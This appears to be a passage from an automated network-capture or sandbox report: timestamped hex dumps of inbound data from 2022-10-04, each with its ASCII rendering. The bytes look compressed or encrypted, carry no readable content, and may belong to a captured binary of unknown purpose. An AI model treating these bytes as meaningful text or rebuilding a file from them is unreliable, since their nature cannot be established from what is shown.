                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19208INData Raw: 88 42 2e 75 53 32 f2 6c ed 5e a1 a8 21 01 12 58 66 6b ce 21 6b 84 06 e4 f9 64 75 27 af 8e 42 a4 11 92 5b df 94 0b fc b8 41 ce 53 7b 30 1c 40 b6 1c 64 53 ae 79 92 b5 a1 26 bd 3a e4 e6 dd bb 0b b3 fc ef b5 d2 cd 98 9c 08 35 82 1c 3e a0 4e 3c ae 13 08 7f 66 7c a1 9f 7f 42 2a 7c ce 42 ba e6 ef 5a 8c c8 6c 7e 59 3f 3f 1d 32 5f cc db 02 96 03 8e 78 4d 2b c3 c7 57 72 ca e7 4e c8 6b 30 fa e0 d9 5a e4 49 41 fc 32 37 75 ba bc 65 e5 04 e4 f5 04 5a 90 9a a3 c5 6c df fb 8a b4 d4 09 05 f0 64 29 8d b0 c4 3b 60 0e a3 7b 13 ca 25 ea 73 9d 63 f4 0e c9 3f 01 17 7f 70 97 83 a8 4a 8d 0d ce 62 a1 a2 f6 38 34 d4 e4 bd 28 77 61 ca 2d a1 b2 67 5b ea 8e 1c de 30 1b 83 f2 a5 73 a7 f5 c8 5a af ec ef 27 ad b6 1f 12 68 20 4d 5a 8b 12 61 79 5d c2 cb 91 c2 45 30 e9 0c d7 0d 0b 95 34 fa
                                                                                                                                                                                                                                    Data Ascii: B.uS2l^!Xfk!kdu'B[AS{0@dSy&:5>N<f|B*|BZl~Y??2_xM+WrNk0ZIA27ueZld);`{%sc?pJb84(wa-g[0sZ'h MZay]E04
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19224INData Raw: 79 5d 11 41 af b3 ea 65 d2 37 f4 0e 50 f8 65 ab 22 ea 13 77 49 15 cb ef b1 6e 2f f7 7f bf 59 08 8b 63 5a 30 be 10 c9 b2 34 95 9a 9d 04 e5 79 15 0b 80 2e 31 8e 64 7f 6f 11 a6 4e a4 ec 18 cd 4b f7 50 26 e9 2f 26 b8 98 1b 19 66 7e 67 50 c0 14 e3 f7 eb d0 2a b8 9c 43 68 44 71 26 6d 34 3f ad c9 cc 0f 4e 0f e9 aa 1c a6 a8 c4 6f e3 fa 26 bc 47 bb 1a d9 68 07 9d 22 b4 f1 0f d2 60 5f b9 58 d7 6c 1d da 24 6a 1c ec fc 1e da 14 1f f7 06 4d 14 8f cc 9d b8 a3 a9 d0 4d 78 cd 06 fb d1 04 23 66 aa cd 15 62 25 aa 7a 3e 16 eb 64 0f 96 3e 49 7a 13 0f b9 f5 d2 e0 a0 e6 a5 9c 65 33 2f 5a 1a c1 79 06 9b 33 05 65 f7 a2 d3 d1 63 8d 11 04 82 aa 0a 3d d3 ba 46 b0 30 4f 24 cc 18 1f d5 61 34 96 bb d9 ea 0e b1 97 58 42 2c c7 7e 12 1a f6 05 8a 60 02 ad d0 ee d6 d5 61 a6 94 49 01 58 59
                                                                                                                                                                                                                                    Data Ascii: y]Ae7Pe"wIn/YcZ04y.1doNKP&/&f~gP*ChDq&m4?No&Gh"`_Xl$jMMx#fb%z>d>Ize3/Zy3ec=F0O$a4XB,~`aIXY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19240INData Raw: d6 f7 db b9 6d 29 ac 72 69 de 09 bd 41 aa e9 cd cf bd 77 a3 9d a8 d3 16 e7 d7 c1 5a 6a 1a ba 58 42 c8 80 eb b8 61 35 a0 c9 fb 77 99 6b e9 af 87 91 f5 38 51 a1 74 b0 ac 10 4c b7 58 7b 3e 83 33 f9 8d a8 52 60 9a ae 8f 93 16 38 fb 59 5b b8 4a 62 85 0e 8f 5b 0e 22 94 55 e6 6d 73 dd 33 44 cc 8a b7 c8 a0 f0 7a 47 f2 18 1e 2c ef 0b 2b 0c a5 ac a4 15 b3 dc f0 93 ca 9b 13 84 d1 30 88 e7 db 2b 13 2d f6 40 e3 52 56 e7 71 5e 8d 6c 46 e5 9f 78 ae 80 7f 9d f5 8d a6 f1 a5 c9 99 a5 3a b3 f3 f3 d1 52 da 59 5b 6f ff e9 7f c7 0a 3b 9b 13 2d 23 2c ee bc 7a e3 41 f4 be c0 47 21 9a 4f 92 3b 5a aa 90 eb e0 f1 9e e0 02 23 d7 6d 3d 15 37 03 55 31 5f dd 11 99 7c 78 f0 58 04 6c 33 7a ab 04 7a 6a 2a 5c 19 31 12 9d 12 bb 62 0f d3 2d 39 ac 85 db d0 06 99 40 b3 f4 06 88 3b 3a bf 3e e6
                                                                                                                                                                                                                                    Data Ascii: m)riAwZjXBa5wk8QtLX{>3R`8Y[Jb["Ums3DzG,+0+-@RVq^lFx:RY[o;-#,zAG!O;Z#m=7U1_|xXl3zzj*\1b-9@;:>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19256INData Raw: 82 19 58 12 f8 b1 2e fe 66 7b 7a 0f f7 7c b4 27 99 4d 60 22 16 03 82 25 c1 81 7d 77 62 f6 3f ad 0c 10 62 4c f1 b9 66 dc d6 63 60 5d 5c 89 a8 ad 4c 2d 3e 80 c3 c9 f2 8a 3c dd bc af 2c 5e a7 d8 ae 83 a4 14 43 90 f7 40 1a 99 a7 48 f3 fd d4 02 e7 7d d3 c7 ca 22 28 c5 65 68 0e 50 d2 a8 85 e7 97 97 78 6f cf 51 75 60 d5 92 c5 2d a8 2e 64 68 0e 98 6e 1e 38 d4 ce e9 61 13 b1 3d 37 19 ee db a6 08 73 b1 3b 3b 77 fc b5 ec 04 62 3c 7c cc f4 7f 0e f2 ec 71 c1 69 35 46 1c dd f1 1b 64 27 62 a1 81 6d 97 14 68 fb 64 8e 48 ab 73 ce 9a 07 df db 89 73 23 71 71 01 38 5b b7 b5 5b 2e 00 30 77 91 84 92 c6 45 00 ca 47 c6 fe 53 2c ef a1 36 b5 05 8c 8f d5 c9 97 1e f8 dc c1 7c a6 47 95 a3 08 f2 8a 88 f9 a2 37 37 fb 43 53 79 3a 8a e8 84 83 44 60 96 d4 00 5f 23 a8 e3 5d 9c 5e 95 4b 94
                                                                                                                                                                                                                                    Data Ascii: X.f{z|'M`"%}wb?bLfc`]\L-><,^C@H}"(ehPxoQu`-.dhn8a=7s;;wb<|qi5Fd'bmhdHss#qq8[[.0wEGS,6|G77CSy:D`_#]^K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19272INData Raw: 6a df e7 cc 9d 04 37 2e 5e 83 ea 00 eb e4 8d c7 9a fd d9 78 ea 91 d4 f8 d9 27 16 88 25 0c 16 f9 33 61 7d 19 e3 0f 55 ff 2d 04 bc 57 4e cf 46 1b 49 f9 5c 39 02 55 01 e6 fa 63 11 3d fe 6d 14 6d 14 b3 21 26 48 66 e7 ae 3f 6b 72 18 fe cf ca 77 8f 79 7d 99 8c c3 70 cb 04 de ee d3 4b 21 43 9a 5b e9 2a 5f f4 8d d6 1e d3 c7 9f 9c b6 b0 09 9b 58 f5 64 b9 49 80 22 bb c8 78 72 92 f0 a8 2d e3 52 4c 11 04 7b 4e 40 bd 14 50 e4 f5 af 64 b8 22 3d 01 5e f9 62 66 d9 8e 25 30 74 31 ed 59 0f 0e c8 f5 4a 11 4d c6 e9 55 f8 11 8e 79 73 14 9a 20 ca 79 00 5e 5e 98 72 bf b2 26 eb 38 f0 9a d7 64 81 fc f5 29 ab 15 29 08 fc 8a f7 27 94 5b 8a 54 59 3b 7c a2 30 a4 f3 96 1f f7 86 bc 2c 53 f6 d3 40 76 ab 74 80 11 13 b4 af 70 24 f7 7f 2b c2 22 39 9b 32 b2 3a ee 46 7b 3e e6 7e 54 77 8f 8b
                                                                                                                                                                                                                                    Data Ascii: j7.^x'%3a}U-WNFI\9Uc=mm!&Hf?krwy}pK!C[*_XdI"xr-RL{N@Pd"=^bf%0t1YJMUys y^^r&8d))'[TY;|0,S@vtp$+"92:F{>~Tw
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19288INData Raw: da 66 7c 17 12 73 70 d1 3b 04 a4 10 b7 a0 76 9a 7a 26 26 dc 6b a1 78 d7 31 e3 bd 6d 40 05 ca 25 20 e9 f8 d7 62 16 77 69 76 36 f5 fd 9b 5f ce d4 b3 51 ab 43 f3 1a 96 dd f2 2e db 7d 7e e6 31 b3 2d 92 8d ac b5 54 ff d4 86 60 a0 af ee 45 18 5c 87 4c 37 59 4e e7 76 34 f4 62 e7 39 49 67 9a a0 60 8e 2f 51 34 be ec de 2a 2d a7 04 02 20 48 f2 f0 70 4e 98 7b 6e 10 33 6c 16 6e aa 38 d0 06 e4 b6 44 cb 26 b3 ea 87 42 bb 24 c2 76 98 18 4d 2f 4b 93 fc 32 8f 6a ac b1 1e 44 98 21 db 82 5e ce 16 12 17 4a 1a e0 8f 3f 70 a8 48 f5 bc 57 04 7c 10 ad 2c dd d8 4c 90 55 0e 71 3f 95 d9 54 53 ad b5 3d bf bc 6c 6b 20 d4 ca 6b 4e 4e 8e 64 0e d3 8c 12 13 61 96 f1 36 bf 70 bb 6b b6 bd 79 be 5d 31 8f 3e f8 36 59 1c 55 b8 18 19 43 2b 35 6c 98 c1 1e c3 cd 16 15 99 1f 55 63 1f f3 a2 0e 2f
                                                                                                                                                                                                                                    Data Ascii: f|sp;vz&&kx1m@% bwiv6_QC.}~1-T`E\L7YNv4b9Ig`/Q4*- HpN{n3ln8D&B$vM/K2jD!^J?pHW|,LUq?TS=lk kNNda6pky]1>6YUC+5lUc/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19304INData Raw: 05 d6 d9 cf b0 5f f7 b9 1f 5a a1 58 78 3f 2c 65 e6 16 f0 98 20 28 39 d6 ff d2 17 49 79 c7 30 8a 64 05 63 78 b8 03 63 36 13 86 a1 e3 65 3e 9b fd 2a 3b 81 e1 9d 23 0e 9c 05 8b 47 03 0a 6f 18 19 e4 62 5b da 80 15 a1 a1 3a 30 bb f0 0d e9 20 c2 0c 96 6a fb c4 66 89 f0 01 6d 34 26 ec 3e 69 3b 2c 68 f9 31 3c bc 10 60 e1 88 32 ce 41 2c 6e 52 04 8b 66 bd 29 91 79 11 3c 1e 28 d6 30 e6 f6 3c 27 96 8d 43 a6 6e 32 a0 25 42 20 d8 fd 8b 49 2d 0c 69 19 d6 a1 47 2b c5 7e 34 a9 cc bb 8c 5a ea b2 5e 5f 5f 05 0f ea fc 38 03 60 8d 42 fc 2b a4 60 e0 f1 dc af 63 81 13 fa 7f bd cd b2 2f 57 70 ca 7d bb 16 e5 b6 f8 f1 35 4f 47 3c 16 5e cb 65 6d 1f a9 3e 56 12 31 aa e8 2d c0 4a 2a 29 9b 16 78 c1 7e 53 1a c4 4c cc 5f 10 a6 57 e4 18 7d d7 d2 73 a5 59 43 ca 84 4b cb 28 5f 1b 5d d5 39
                                                                                                                                                                                                                                    Data Ascii: _ZXx?,e (9Iy0dcxc6e>*;#Gob[:0 jfm4&>i;,h1<`2A,nRf)y<(0<'Cn2%B I-iG+~4Z^__8`B+`c/Wp}5OG<^em>V1-J*)x~SL_W}sYCK(_]9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19320INData Raw: 59 ab a6 ca 0b a3 92 9e 9d 62 ab 5b 2a 41 f1 df 0c d0 9f 39 c9 2a f7 0c de e6 57 69 92 4e f8 85 bf c4 3b c5 c1 d9 8b a1 06 85 d6 e9 60 7e 12 68 51 df e3 80 57 b8 05 72 85 76 63 50 b6 0f 9d bc dc af a1 c6 d8 61 4f 47 7b e8 60 96 ad b7 7b 1f 18 64 bd cc d1 c3 f0 9f e0 ad bb 7a a6 79 58 4f 82 27 67 ec 4d ef 7e ec f0 dc 71 01 fe 93 75 c8 89 17 57 b9 dd 80 2b 04 b7 a7 e1 a1 7b 8e 8a ca e1 f3 79 b0 2e 4c 59 5a ad 67 df 7d 50 0f c0 76 e9 11 d8 15 d5 62 ad cb 39 35 f8 af 17 aa e4 2b cb ee 3c 18 7d 01 87 15 4b 15 af 30 8b d7 e6 19 0c 99 c6 fb 54 e3 3c e8 1e 63 0c 72 75 16 a5 53 1d f7 7c 59 54 5a f3 72 af bd c3 17 3c 4e a8 7b 21 e2 c7 f4 4b a2 d1 69 88 b1 8a 80 44 c1 bf 68 95 20 c7 e5 3a 30 83 8a 87 b2 81 fc d6 92 6e 31 5f 63 dc 65 e4 9f 9e 46 6d 83 89 64 ab b3 41
                                                                                                                                                                                                                                    Data Ascii: Yb[*A9*WiN;`~hQWrvcPaOG{`{dzyXO'gM~quW+{y.LYZg}Pvb95+<}K0T<cruS|YTZr<N{!KiDh :0n1_ceFmdA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19336INData Raw: 4a d8 5a e2 10 e8 34 79 f9 06 5c 04 50 af 5f 06 8c 35 6a fe c5 f6 58 a5 f5 25 ca 95 e7 f9 3f 04 f8 c0 31 25 f3 6d 84 c1 b6 f0 8a 9d bb 45 20 79 12 76 d0 a8 ae 12 48 00 19 c0 3a bb 9c cd b7 0c 9a 78 0e d1 cb 9d 21 39 4c 2a 24 ec c7 a6 26 35 b0 58 87 14 3e b3 ca 31 f3 91 dc e9 a2 da b6 71 ea a6 84 68 fb cf e1 33 c4 20 45 ac d5 fe 3b b0 61 5b 8c a7 ca 32 68 c7 12 26 ef 73 67 84 1e c8 b1 7c 06 6c 08 fc 0b 60 a4 ea 32 2c 41 98 68 92 95 bd f7 aa 59 ec f7 af f6 d0 40 f1 a4 c7 cc 03 2b 4d df 8d be b1 d7 f5 d8 c3 e0 b5 8b 58 2f d2 39 0c 69 ce 7e da b4 05 23 6e 52 73 da 42 17 a2 9b c2 2d f9 e8 8c f5 89 56 d4 29 54 b5 da 14 b2 a5 20 64 e0 cf 6c 81 80 f6 11 82 2f 66 9d a2 1c 86 1a 41 90 3f a5 7e eb 9d ce 98 ce 4a 34 17 41 04 20 8e 31 ff 59 0a 8c b0 e5 0a f2 c5 9d 90
                                                                                                                                                                                                                                    Data Ascii: JZ4y\P_5jX%?1%mE yvH:x!9L*$&5X>1qh3 E;a[2h&sg|l`2,AhY@+MX/9i~#nRsB-V)T dl/fA?~J4A 1Y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19352INData Raw: f3 5e bd 4e de 7a 96 62 7f bf 98 61 4a c0 15 73 28 64 37 98 94 7b 6f 51 85 e2 35 e6 39 4a 84 23 81 bf c4 83 33 86 d7 d8 40 d9 39 49 ab 2d 0c 58 d4 20 32 e3 a0 a5 ff 14 30 f1 61 44 ce c8 57 46 01 3a 8c 38 3f d0 db ed e9 a1 f6 76 5c ba 37 58 95 87 e0 47 42 98 3a 93 b4 11 12 6b fe 08 cc b9 cf 82 4a df 78 17 fd 91 61 bb 2e 3a 51 fb 49 9e 44 b2 f4 b0 23 d5 9d 09 78 b0 ad d3 15 ff 20 1a c0 f0 ce 45 f3 c5 39 57 db 2c a9 7d 7e 68 1c 09 be e1 b3 d2 8b 84 ad eb cf f9 c4 60 9e 07 da f0 81 69 3a 62 7c 61 a8 f5 fe 0e c9 9f 1c ab 0c d3 64 54 7c a4 c3 15 37 3e d8 8c 44 30 05 22 03 6f 60 de 5f ae 30 ad ad a0 03 10 6a db 8b cc 4e 39 ca e2 c3 25 b0 8f 1a f2 e2 7b 72 b1 8f aa 6e 01 3e ab 41 76 1e f0 72 c6 04 94 d4 e9 15 0f 42 a0 4c cb 0e 45 77 16 9b 87 f8 5a b7 c3 4e 4f c2
                                                                                                                                                                                                                                    Data Ascii: ^NzbaJs(d7{oQ59J#3@9I-X 20aDWF:8?v\7XGB:kJxa.:QID#x E9W,}~h`i:b|adT|7>D0"o`_0jN9%{rn>AvrBLEwZNO
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19368INData Raw: b4 90 6c 62 18 27 34 4d 5c 70 fb 18 af cd c6 15 ce 59 14 25 f1 2c c7 32 8a 0e a8 20 70 ca ec 66 ec e9 6f ff ed 59 f6 ce a1 ac d8 61 fc cb ea f6 11 ba 18 56 d0 6c 7b ab 7f c0 0f 58 a9 31 c9 9d 34 90 d8 a4 d6 1e a6 3b 6c a2 ed 50 59 93 f9 d1 75 31 af ab db dd 43 9c b2 14 3d 45 00 bd f5 1a f5 f1 fc 02 11 18 41 14 1f d5 5b 16 70 22 c6 b1 2e 12 cc 53 41 35 ae 7c 80 1e 39 92 b6 d9 45 04 ed f2 18 23 b9 98 a7 1c de 21 d3 0e bc c6 c0 42 42 b8 ac c6 8f 03 9d 1c 86 3f 8b 9d 92 96 09 90 69 f1 ad 2a 81 0d 59 eb 7b 91 94 fd 16 0d 1f 52 63 6e 1a 85 84 8a 65 3d 76 fc e1 28 43 a4 fe 21 9e 32 21 e2 c4 d7 8e d8 cc 56 83 8e 3a eb 95 d2 d5 b4 22 ac ba f6 1e fb cd 66 5c 57 65 d3 36 f2 22 d7 7a 50 67 d0 15 85 25 5d 37 4b 98 c8 05 fc 7f e6 74 2d 95 20 5c ae 8d 74 06 f0 69 19 aa
                                                                                                                                                                                                                                    Data Ascii: lb'4M\pY%,2 pfoYaVl{X14;lPYu1C=EA[p".SA5|9E#!BB?i*Y{Rcne=v(C!2!V:"f\We6"zPg%]7Kt- \ti
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19384INData Raw: 28 a3 47 86 f2 62 f1 5b e5 62 24 d3 71 de 8c 2b 5c 85 dd c9 6c 24 5e 25 a9 94 a7 3a 55 e3 d7 13 f7 c2 fc 6c af 26 d6 3f fd e6 d3 4d 85 42 02 46 36 e4 f1 18 d4 01 c7 16 52 7d 1a e1 f8 b7 e6 47 32 47 7d 33 cb e7 de 4b 70 d1 ef a3 ce 32 8e f9 2e 64 ec 0b 02 30 5a a0 0c 9c 9b a4 3b 36 2b 9f c5 fb 27 56 84 61 32 63 94 36 4c c5 6d f5 9e 2b 81 d5 7c a3 58 76 a7 8b 14 78 0a 4a d0 dc d0 1e 7b 40 dc 64 1c b8 d0 a0 0a eb cf a6 ce e9 bb 88 5c f1 2f 7f 51 fb e7 af ff fc d3 2e 8e 1d 2e 4a a9 c1 bd d8 e1 80 b4 ae 59 71 82 67 e3 3a 7e 06 14 a1 e7 ba 09 05 ad 13 e0 7a 2a f9 a9 ed ee 40 a5 7d c7 5f 39 51 d0 ba 6a 5f 06 90 a8 92 93 cc d5 92 e1 8f 49 36 e8 fc 66 f4 f6 e2 9f 89 cc 32 fa e0 a7 22 6a ce ce b2 e0 f8 44 67 61 db 06 01 32 37 ed 4a 0b 4a e2 37 d9 a5 16 e2 fd 85 41
                                                                                                                                                                                                                                    Data Ascii: (Gb[b$q+\l$^%:Ul&?MBF6R}G2G}3Kp2.d0Z;6+'Va2c6Lm+|XvxJ{@d\/Q..JYqg:~z*@}_9Qj_I6f2"jDga27JJ7A
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19400INData Raw: bf f9 81 5d f7 db d6 3e 5f 0c 86 c4 1a da d9 4e 4e 72 b8 71 17 e9 7c 03 80 28 e4 81 ca 90 27 09 c2 0b bc af c1 2c 98 6e bd c6 10 94 32 80 ac 2a ba 53 35 7c 90 89 8d 90 47 19 50 e6 d9 55 42 03 27 0c c7 b3 88 e5 89 cd 93 1e c6 43 1c d8 b2 35 b0 fd 65 85 e1 f2 32 14 56 19 6c 8b d9 86 98 86 a7 13 b8 66 07 88 f3 a7 29 e6 cb 67 a0 03 57 13 3b 66 1a 1d be c2 d8 de f2 98 de 85 99 0d cd 1e 26 1d f9 24 de 6d 67 0e e8 99 31 fb 3d 85 5b 67 c6 c0 3e 03 c2 33 3d a8 f8 c5 de a8 d4 16 f9 b7 95 3e f9 55 29 a8 41 66 3e e6 ad ab 62 f6 d2 3b 99 ea f9 d7 bd 60 9f d6 0c 42 25 c3 c6 5f f9 01 a5 b7 f1 0c fd 0a f6 43 4b cd 28 c1 6e ac 80 02 a2 46 e1 9a 6d 41 d0 75 92 e2 10 ab ae 7b 65 83 df 32 65 87 08 6e e6 b8 07 51 95 e8 42 03 36 e5 af dd 4e bb c7 5d 6f 49 71 24 07 30 b1 a1 57
                                                                                                                                                                                                                                    Data Ascii: ]>_NNrq|(',n2*S5|GPUB'C5e2Vlf)gW;f&$mg1=[g>3=>U)Af>b;`B%_CK(nFmAu{e2enQB6N]oIq$0W
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19416INData Raw: 9b 73 ad 1d 52 19 dd 47 5c 82 4d ef 0d 79 cc 6c ea 6b b5 34 2a 6b 86 81 f5 eb 7c be 63 22 6e b5 10 cc 70 24 e2 8b 65 6f eb c1 d4 10 6f 36 60 2a 29 12 19 88 6a 2d 6b 0a 59 c5 a5 99 8f 25 33 e5 cd 67 3e f9 f3 14 ad 77 5e dd ac 94 69 bd 74 86 7e 39 1d 72 4c b9 c2 9d 0f e8 fe 4c ea 47 3e 9d 5b ee 51 37 08 76 06 15 76 db 05 07 2f 02 60 9f 38 3f 06 f8 d3 6c 82 f4 51 a5 a2 cc 85 ba f4 00 71 b5 c8 24 92 96 82 ed b8 8f 14 1e 0a f7 5b 42 91 6b bf a3 ce fb 4d b2 a4 bf 1f 36 5f e2 69 ed 30 96 df 40 96 2c 7f 4c a3 23 1f c3 99 3b 1b b5 2e 83 e2 be 5f e3 f8 e7 20 c1 28 c6 c7 f1 05 b7 df 1f 2e 8f 67 19 06 c2 e5 54 4a 87 73 a1 4b 99 5b 2a 21 03 c0 46 4c 89 29 cc 18 17 9c 02 9b 5e 28 8e d2 19 fb c8 1c 25 56 58 af dd 8b f2 5e 28 eb a9 d0 06 25 63 a3 69 8b 89 5e 6c 94 7a 2a
                                                                                                                                                                                                                                    Data Ascii: sRG\Mylk4*k|c"np$eoo6`*)j-kY%3g>w^it~9rLLG>[Q7vv/`8?lQq$[BkM6_i0@,L#;._ (.gTJsK[*!FL)^(%VX^(%ci^lz*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19432INData Raw: 33 fd a9 ee fb 14 d7 52 d9 e8 9d d6 b6 06 58 65 6b 5c c6 fa ff 7e a5 e6 b8 fa 4d f5 9b 74 8f a8 cb 75 f8 81 56 cf 67 8b e8 15 9a 1b c5 fe b6 db 7c 6e 0d c5 bd 7f 9f cd ea a6 1e b5 0d 73 c6 35 25 89 34 2d c1 34 9a 16 7b c7 1e 62 27 7c 11 80 c8 82 36 49 b4 d1 01 29 0d f4 42 94 ba 22 64 1b e5 83 4d 90 62 12 5f 31 79 a9 05 77 a3 f9 34 9b 20 f3 5f ab 56 d0 d4 6e 54 cb ee bd 31 f8 4a f2 6a 87 b8 a0 4f 6f 96 f5 5a c2 1a 7c c1 04 b9 f6 1e b0 17 bb b4 c9 c6 5e ee bf e1 75 e8 6c b0 0d 99 c1 8d 64 af 75 36 f6 f2 8f fa 0a 34 1c 69 b4 ba 89 69 30 69 df 3d bf fc b3 9a e8 2a 9d 72 b5 a8 d7 a1 d9 a9 13 be 4b a4 b9 26 58 45 ab 22 e2 6a b2 06 59 b6 83 47 61 dc fb 7e e5 bb 12 e8 f8 c6 db be 08 b9 77 96 80 c4 d0 34 d0 f4 62 32 c6 52 6a 13 c2 02 57 b9 48 18 10 0d 97 6c cc bd
                                                                                                                                                                                                                                    Data Ascii: 3RXek\~MtuVg|ns5%4-4{b'|6I)B"dMb_1yw4 _VnT1JjOoZ|^uldu64ii0i=*rK&XE"jYGa~w4b2RjWHl
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19448INData Raw: 55 6e 70 00 d6 76 25 0f 0a fc 96 07 8c fe 28 90 53 e3 77 0d 80 59 cb 1b 9d 4c e1 d5 11 2e 57 cc 66 3d 6b 8e c4 fe 15 be 87 5f 92 d3 a8 ea e1 05 58 ab 55 3d 09 32 b5 0d d2 55 6e 5a 2f 2b e0 35 c6 f8 d8 f3 be 93 0b 53 54 03 29 f8 96 ed b9 13 41 05 6f 5d a9 c5 bf 4b d4 06 0e 8b cd 2a be f8 b8 8d dd 1b 54 7f 9e fc b6 e8 25 75 13 d7 bc ab b8 aa ea 14 3e 8f 09 51 ab 89 22 d4 d7 2a 9c 41 14 57 51 56 f1 b4 48 ec 44 44 00 c5 33 6a bc ae cc 43 0f 62 10 7d b5 42 04 ae c9 d9 79 77 9b 2f fb 3e 68 46 b2 1c c5 f9 89 c2 b1 e4 44 c9 6f bf 13 8c b2 d1 75 e8 58 b2 6b 22 c9 ee 9f 5d 48 d6 72 33 ad a0 91 0d f2 df 88 30 4f 49 9a ba 9b 14 7d c0 aa ad 7b f1 b3 22 7a 4e 6a 79 c3 87 c7 32 b4 cb f8 27 b2 c9 fb e2 67 8e 27 f3 fb f1 52 18 43 d7 73 4c ea ef 1b 9e b3 73 fe fe 6e f4 ea
                                                                                                                                                                                                                                    Data Ascii: Unpv%(SwYL.Wf=k_XU=2UnZ/+5ST)Ao]K*T%u>Q"*AWQVHDD3jCb}Byw/>hFDouXk"]Hr30OI}{"zNjy2'g'RCsLsn
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19464INData Raw: 2d 70 22 60 1b 30 31 58 d4 fd 94 dc 06 ff cd 2a de b9 77 59 9b 08 b2 46 8b 23 12 c6 02 ee c9 9a 44 55 8b 0e d9 8a 84 7a ff bf 50 2e 4d 15 58 67 8b 3a a5 b1 7e 51 2d ee 37 43 61 d1 62 8a 79 ea d9 a9 55 d0 09 9d 60 ee e5 2c fe 7b 47 58 79 46 b9 59 6f 09 bb fd 4a ef 5e f7 36 9c dd fc f2 65 3f 1e 19 24 46 c4 5c 37 5a 61 4c f5 bd f1 71 38 49 d1 54 6b 47 6d 71 ca f1 4c 66 fe bd 25 4f c8 f5 7e 5a a9 b3 75 1b 79 48 5a 34 ef 7d 6d 0e 21 d9 bd 6d ac 25 e2 05 0b be ce 29 61 df dd 20 bd b4 4c e5 a6 57 98 30 8a 26 d0 e2 72 bc ca 76 87 2b 17 04 1f 93 38 de 9f 3a 43 31 24 83 9a 78 a3 52 b0 18 6d ba 78 f9 22 67 89 bd 1f bd 62 89 03 13 62 be aa 41 2f c2 ab 90 a2 ad c7 61 8d c9 fe f5 2f a3 24 2e ac f7 7b a0 55 cc bd 8f 9c ac 48 70 eb bc 7b c4 29 3f bd e3 06 3c bd 23 38 2b
                                                                                                                                                                                                                                    Data Ascii: -p"`01X*wYF#DUzP.MXg:~Q-7CabyU`,{GXyFYoJ^6e?$F\7ZaLq8ITkGmqLf%O~ZuyHZ4}m!m%)a LW0&rv+8:C1$xRmx"gbbA/a/$.{UHp{)?<#8+
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19480INData Raw: 63 65 ee 22 56 5c 90 71 e1 fd 1b ef 09 c3 de f5 91 6c 8c ed 23 93 8c f4 83 b4 21 65 e1 fd 4e a6 36 84 86 16 57 8a fd 51 dd e9 23 e8 e2 77 9a 4b 57 71 a9 a9 ed ad fd 6d fe e2 ed 95 ce e6 b7 1b 16 a6 b2 2a 2d 0b ec 0e 3b a1 ca 31 4c 61 56 58 7b 7b 48 65 f8 03 82 d1 88 73 02 ae 07 b4 a0 3a 08 d9 a6 3a 6a 89 27 96 f7 ef 7d 5c 78 ad 31 c6 1b 8f 98 99 81 06 fd 5e 3b 8a 61 9e 3a 28 b8 1f ef f4 a8 92 bb 58 5b a9 d8 47 8e 88 66 89 6d ca f8 a2 aa 39 ed d9 6b a0 18 a2 ff 43 8c 4f 7f f0 d4 d2 3c fc 5d 1b 56 53 06 e7 0b 75 a1 c9 9f 5e 6c 5d ae fc ed ff a0 d4 0d a8 26 9b c2 87 32 6a 2c 5c 3d 27 86 46 d3 a1 02 e9 bc f1 e0 3c f9 62 26 64 9a f0 2c 51 59 63 fd a5 9e 07 55 4a 69 5c ce 56 2b 1b 60 6b 6a 50 b0 78 76 28 86 c2 a6 03 fb 8a 98 99 27 e7 0f eb 33 d8 99 90 1b d2 d9
                                                                                                                                                                                                                                    Data Ascii: ce"V\ql#!eN6WQ#wKWqm*-;1LaVX{{Hes::j'}\x1^;a:(X[Gfm9kCO<]VSu^l]&2j,\='F<b&d,QYcUJi\V+`kjPxv('3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19496INData Raw: a0 b7 64 c7 66 34 0a 4b be 05 f9 62 3d eb 43 98 b2 2f 23 fa 67 8b 27 8e a4 b1 27 92 59 1c 3d ee 97 f0 63 0a c2 c2 00 6b f2 1a f1 c4 65 4f df 7a 4b 78 3d 9f f4 91 d7 4d bd a0 d5 6c 25 a7 e5 08 64 1d 1d f6 8e b4 eb 44 05 18 87 da 6c f4 b2 58 51 28 ae f3 4d 10 ed 2e ad 1a 06 08 8d 9a d0 5d 01 ed 89 d0 48 d2 83 ff 3c 6e 81 51 ab e1 51 7a a2 c2 ff e4 bc 17 0b ee 9c cc cd ce 01 30 b0 c7 87 ce 53 ca 29 dc ff d5 71 ba 97 08 d2 46 75 9c 89 75 03 86 f3 8a ad 77 40 f5 71 54 b5 8f 4e 9a 62 b0 7b a8 43 24 3e 94 37 f4 7b 86 fd f8 7f f9 b8 0b ca c2 b2 2d e1 87 1c 7e d0 35 1e 53 45 24 e8 6e 97 5b 48 13 e5 bd 05 1c 07 c3 2c b2 6a ca 4e e1 88 f6 3a 23 23 b1 27 6e c8 88 e2 02 1c 52 21 f3 1e 1c 6e a8 fc 70 38 b8 a4 d2 7e 4e 00 c8 77 29 32 b2 fe a8 bd ba 3e b9 e9 5d b1 11 6e
                                                                                                                                                                                                                                    Data Ascii: df4Kb=C/#g''Y=ckeOzKx=Ml%dDlXQ(M.]H<nQQz0S)qFuuw@qTNb{C$>7{-~5SE$n[H,jN:##'nR!np8~Nw)2>]n
